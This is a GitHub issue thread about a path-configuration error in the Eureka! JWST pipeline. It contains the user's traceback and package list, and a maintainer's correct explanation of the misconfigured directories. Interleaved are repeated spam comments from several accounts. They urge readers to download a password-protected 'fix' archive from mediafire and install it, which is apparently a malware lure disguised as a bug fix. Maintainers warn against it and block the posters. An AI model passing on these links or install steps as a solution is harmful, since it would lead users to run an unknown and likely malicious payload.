### ISSUE TITLE
[Bug]: AssertionError for output metadata file S3

### ISSUE THREAD

**Issue by sstamer23** [kevin218/Eureka#696]
### FAQ check

- [X] Yes, I checked the FAQ and my question has not been addressed.

### Instrument

NIRSpec (Stages 1-3)

### What happened?

When running Stage 3 with the WASP-39 b test data, I got the following:
`AssertionError: WARNING: Unable to find an output metadata file from Eureka!'s S3 in the folder:
"/home/Users/sarahstamer/Data/JWST-Sim/NIRSpec/Stage3/"`
I'm betting the input/output directory is wrong somewhere in the S3 file, but I checked it against the one on the ReadTheDocs website and it was the same directories. 

### Error traceback output

```
Traceback (most recent call last):
  File "/Users/sarahstamer/DataAnalysis/JWST/MyFirstEureka/demos/run_eureka.py", line 30, in <module>
    spec, lc, meta = s4.genlc(eventlabel, ecf_path=ecf_path)
  File "/opt/miniconda3/envs/eureka/lib/python3.10/site-packages/eureka/S4_generate_lightcurves/s4_genLC.py", line 93, in genlc
    me.findevent(meta, 'S3', allowFail=False)
  File "/opt/miniconda3/envs/eureka/lib/python3.10/site-packages/eureka/lib/manageevent.py", line 214, in findevent
    raise AssertionError(f'WARNING: Unable to find an output metadata file'
AssertionError: WARNING: Unable to find an output metadata file from Eureka!'s S3 in the folder:
"/home/Users/sarahstamer/Data/JWST-Sim/NIRSpec/Stage3/"
```

### What operating system are you using?

MacOS Sonoma 14.6.1

### What version of Python are you running?

Python 3.10.14

### What Python packages do you have installed?

```
# packages in environment at /opt/miniconda3/envs/eureka:
#
# Name                    Version                   Build  Channel
alabaster                 1.0.0                    pypi_0    pypi
asciitree                 0.3.3                    pypi_0    pypi
asdf                      3.4.0                    pypi_0    pypi
asdf-astropy              0.6.1                    pypi_0    pypi
asdf-coordinates-schemas  0.3.0                    pypi_0    pypi
asdf-standard             1.1.1                    pypi_0    pypi
asdf-transform-schemas    0.5.0                    pypi_0    pypi
asdf-wcs-schemas          0.4.0                    pypi_0    pypi
asteval                   1.0.2                    pypi_0    pypi
astraeus                  0.3                      pypi_0    pypi
astropy                   6.1.2                    pypi_0    pypi
astropy-healpix           1.0.3                    pypi_0    pypi
astropy-iers-data         0.2024.8.19.0.32.16          pypi_0    pypi
astroquery                0.4.7                    pypi_0    pypi
astroscrappy              1.2.0                    pypi_0    pypi
asttokens                 2.4.1                    pypi_0    pypi
attrs                     24.2.0                   pypi_0    pypi
babel                     2.16.0                   pypi_0    pypi
backports-tarfile         1.2.0                    pypi_0    pypi
batman-package            2.4.9                    pypi_0    pypi
bayesicfitting            3.2.1                    pypi_0    pypi
beautifulsoup4            4.12.3                   pypi_0    pypi
bokeh                     2.4.3                    pypi_0    pypi
bottleneck                1.4.0                    pypi_0    pypi
bzip2                     1.0.8                h6c40b1e_6  
ca-certificates           2024.7.2             hecd8cb5_0  
ccdproc                   2.4.2                    pypi_0    pypi
celerite                  0.4.3                    pypi_0    pypi
certifi                   2024.7.4                 pypi_0    pypi
cftime                    1.6.4                    pypi_0    pypi
charset-normalizer        3.3.2                    pypi_0    pypi
click                     8.1.7                    pypi_0    pypi
cloudpickle               3.0.0                    pypi_0    pypi
contourpy                 1.2.1                    pypi_0    pypi
corner                    2.2.2                    pypi_0    pypi
crds                      11.18.1                  pypi_0    pypi
cycler                    0.12.1                   pypi_0    pypi
dask                      2024.8.1                 pypi_0    pypi
decorator                 5.1.1                    pypi_0    pypi
dill                      0.3.8                    pypi_0    pypi
docutils                  0.21.2                   pypi_0    pypi
drizzle                   1.15.3                   pypi_0    pypi
dynesty                   2.1.4                    pypi_0    pypi
emcee                     3.1.6                    pypi_0    pypi
eureka                    0.10                     pypi_0    pypi
exceptiongroup            1.2.2                    pypi_0    pypi
executing                 2.0.1                    pypi_0    pypi
exotic-ld                 3.2.0                    pypi_0    pypi
fasteners                 0.19                     pypi_0    pypi
filelock                  3.15.4                   pypi_0    pypi
fonttools                 4.53.1                   pypi_0    pypi
fsspec                    2024.6.1                 pypi_0    pypi
future                    1.0.0                    pypi_0    pypi
george                    0.4.3                    pypi_0    pypi
gwcs                      0.21.0                   pypi_0    pypi
h5netcdf                  1.3.0                    pypi_0    pypi
h5py                      3.11.0                   pypi_0    pypi
html5lib                  1.1                      pypi_0    pypi
idna                      3.7                      pypi_0    pypi
imageio                   2.35.1                   pypi_0    pypi
imagesize                 1.4.1                    pypi_0    pypi
importlib-metadata        8.4.0                    pypi_0    pypi
iniconfig                 2.0.0                    pypi_0    pypi
ipython                   8.26.0                   pypi_0    pypi
jaraco-classes            3.4.0                    pypi_0    pypi
jaraco-context            6.0.1                    pypi_0    pypi
jaraco-functools          4.0.2                    pypi_0    pypi
jedi                      0.19.1                   pypi_0    pypi
jinja2                    3.1.4                    pypi_0    pypi
jmespath                  1.0.1                    pypi_0    pypi
jsonschema                4.23.0                   pypi_0    pypi
jsonschema-specifications 2023.12.1                pypi_0    pypi
jwst                      1.11.4                   pypi_0    pypi
keyring                   25.3.0                   pypi_0    pypi
kiwisolver                1.4.5                    pypi_0    pypi
lazy-loader               0.4                      pypi_0    pypi
libffi                    3.4.4                hecd8cb5_1  
lmfit                     1.3.2                    pypi_0    pypi
locket                    1.0.0                    pypi_0    pypi
markupsafe                2.1.5                    pypi_0    pypi
matplotlib                3.9.2                    pypi_0    pypi
matplotlib-inline         0.1.7                    pypi_0    pypi
more-itertools            10.4.0                   pypi_0    pypi
ncurses                   6.4                  hcec6c5f_0  
netcdf4                   1.6.5                    pypi_0    pypi
networkx                  3.3                      pypi_0    pypi
numcodecs                 0.13.0                   pypi_0    pypi
numpy                     1.24.4                   pypi_0    pypi
numpydoc                  1.8.0                    pypi_0    pypi
opencv-python-headless    4.10.0.84                pypi_0    pypi
openssl                   3.0.14               h46256e1_0  
packaging                 24.1                     pypi_0    pypi
pandas                    2.2.2                    pypi_0    pypi
parsley                   1.3                      pypi_0    pypi
parso                     0.8.4                    pypi_0    pypi
partd                     1.4.2                    pypi_0    pypi
pexpect                   4.9.0                    pypi_0    pypi
photutils                 1.13.0                   pypi_0    pypi
pillow                    10.4.0                   pypi_0    pypi
pip                       24.2            py310hecd8cb5_0  
pluggy                    1.5.0                    pypi_0    pypi
poppy                     1.1.1                    pypi_0    pypi
prompt-toolkit            3.0.47                   pypi_0    pypi
psutil                    6.0.0                    pypi_0    pypi
ptyprocess                0.7.0                    pypi_0    pypi
pure-eval                 0.2.3                    pypi_0    pypi
pyerfa                    2.0.1.4                  pypi_0    pypi
pygments                  2.18.0                   pypi_0    pypi
pyparsing                 3.1.2                    pypi_0    pypi
pysynphot                 2.0.0                    pypi_0    pypi
pytest                    8.3.2                    pypi_0    pypi
python                    3.10.14              h5ee71fb_1  
python-dateutil           2.9.0.post0              pypi_0    pypi
pytz                      2024.1                   pypi_0    pypi
pyvo                      1.5.2                    pypi_0    pypi
pyyaml                    6.0.2                    pypi_0    pypi
readline                  8.2                  hca72f7f_0  
referencing               0.35.1                   pypi_0    pypi
reproject                 0.14.0                   pypi_0    pypi
requests                  2.32.3                   pypi_0    pypi
rpds-py                   0.20.0                   pypi_0    pypi
scikit-image              0.24.0                   pypi_0    pypi
scipy                     1.9.3                    pypi_0    pypi
semantic-version          2.10.0                   pypi_0    pypi
setuptools                72.1.0          py310hecd8cb5_0  
setuptools-scm            8.1.0                    pypi_0    pypi
six                       1.16.0                   pypi_0    pypi
snowballstemmer           2.2.0                    pypi_0    pypi
soupsieve                 2.6                      pypi_0    pypi
spherical-geometry        1.3.2                    pypi_0    pypi
sphinx                    8.0.2                    pypi_0    pypi
sphinxcontrib-applehelp   2.0.0                    pypi_0    pypi
sphinxcontrib-devhelp     2.0.0                    pypi_0    pypi
sphinxcontrib-htmlhelp    2.1.0                    pypi_0    pypi
sphinxcontrib-jsmath      1.0.1                    pypi_0    pypi
sphinxcontrib-qthelp      2.0.0                    pypi_0    pypi
sphinxcontrib-serializinghtml 2.0.0                    pypi_0    pypi
sqlite                    3.45.3               h6c40b1e_0  
stack-data                0.6.3                    pypi_0    pypi
stcal                     1.4.4                    pypi_0    pypi
stdatamodels              1.7.2                    pypi_0    pypi
stpipe                    0.7.0                    pypi_0    pypi
stsci-image               2.3.9                    pypi_0    pypi
stsci-imagestats          1.8.3                    pypi_0    pypi
stsci-stimage             0.2.9                    pypi_0    pypi
svo-filters               0.4.4                    pypi_0    pypi
tabulate                  0.9.0                    pypi_0    pypi
tifffile                  2024.8.10                pypi_0    pypi
tk                        8.6.14               h4d00af3_0  
tomli                     2.0.1                    pypi_0    pypi
toolz                     0.12.1                   pypi_0    pypi
tornado                   6.4.1                    pypi_0    pypi
tqdm                      4.66.5                   pypi_0    pypi
traitlets                 5.14.3                   pypi_0    pypi
tweakwcs                  0.8.8                    pypi_0    pypi
typing-extensions         4.12.2                   pypi_0    pypi
tzdata                    2024.1                   pypi_0    pypi
uncertainties             3.2.2                    pypi_0    pypi
urllib3                   2.2.2                    pypi_0    pypi
wcwidth                   0.2.13                   pypi_0    pypi
webencodings              0.5.1                    pypi_0    pypi
wheel                     0.43.0          py310hecd8cb5_0  
wiimatch                  0.3.2                    pypi_0    pypi
xarray                    2024.7.0                 pypi_0    pypi
xz                        5.4.6                h6c40b1e_1  
zarr                      2.18.2                   pypi_0    pypi
zipp                      3.20.0                   pypi_0    pypi
zlib                      1.2.13               h4b97444_1 
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AarynnCarter** [comment]
@sstamer23 Don't download that!

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AarynnCarter** [comment]
@taylorbell57 @kevin218 I don't know what's going on with this spam accounts with the download requests. They happened to another repo I'm part of, so seems to be some sitewise Github scamming attempt or something.

**Comment by taylorbell57** [comment]
Working on blocking them from my end. I'll also just delete the comments after they're blocked

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by taylorbell57** [comment]
As for your actual question @sstamer23, you can see from your traceback that you are actually running Stage 4 (see where it says `spec, lc, meta = s4.genlc(eventlabel, ecf_path=ecf_path)`). Additionally, you're right that there are issues with the directories that you have setup in your ECF files. Your `topdir`+`inputdir` in your Stage 4 ECF is likely currently set to `/home/Users/sarahstamer/Data/JWST-Sim/NIRSpec/Stage3/` which is not how MacOS directories are setup (you'll have something more like `/Users/sarahstamer/...`). Please ensure your `topdir`, `inputdir`, and `outputdir` are all entered correctly into all of your ECFs and that those folders actually exist in your machine. We are not administrators of your machine, so only you will know what folders you've actually made and where they all are.
